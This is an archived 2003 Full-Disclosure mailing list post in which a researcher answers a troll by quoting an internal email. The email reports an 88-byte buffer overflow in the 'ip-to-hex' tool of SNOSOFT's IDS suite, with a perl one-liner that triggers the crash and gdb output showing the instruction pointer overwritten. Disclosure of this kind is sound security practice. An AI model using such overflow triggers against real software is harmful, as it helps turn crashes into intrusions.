[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

Re: [Full-Disclosure] Senseless Buffer Overflow in SNOSOFT.COM IDS Suite

To: snosoft@ziplip.com
Subject: Re: [Full-Disclosure] Senseless Buffer Overflow in SNOSOFT.COM IDS Suite
From: KF <dotslash@snosoft.com>
Date: Sat, 15 Nov 2003 19:46:01 -0500

Proof of concept attached.
=P

gotta love a troll.
-KF

--- Begin Message ---

To: recon@snosoft.com
Subject: iptohex.c overflow
From: KRFinisterre@xxx.com
Date: Fri, 17 Oct 2003 13:58:19 -0400

so we don't look dumb we should fix the 88 byte buffer overflow in
ip-to-hex.

Starting program: /root/prod-source/RSN/bin/ip-to-hex `perl -e 'print "A" x
88'`
Ox00

Program received signal SIGSEGV, Segmentation fault.
0x41414141 in ?? ()
(gdb) i r
eax            0x0      0
ecx            0x4014e280       1075110528
edx            0x5      5
ebx            0x4014fe80       1075117696
esp            0xbffff708       0xbffff708
ebp            0x41414141       0x41414141
esi            0x40013540       1073820992
edi            0xbffff804       -1073743868
eip            0x41414141       0x41414141

-KF

--- End Message ---

References:
- [Full-Disclosure] Senseless Buffer Overflow in SNOSOFT.COM IDS Suite
  - From: "snosoft@ziplip.com" <snosoft@ziplip.com>

Prev by Date: [Full-Disclosure] Senseless Buffer Overflow in SNOSOFT.COM IDS Suite
Next by Date: RE: [Full-Disclosure] SPAM and "undisclosed recipients"
Previous by thread: [Full-Disclosure] Senseless Buffer Overflow in SNOSOFT.COM IDS Suite
Next by thread: [Full-Disclosure] Free scanner for MS03-049
Index(es):
- Date
- Thread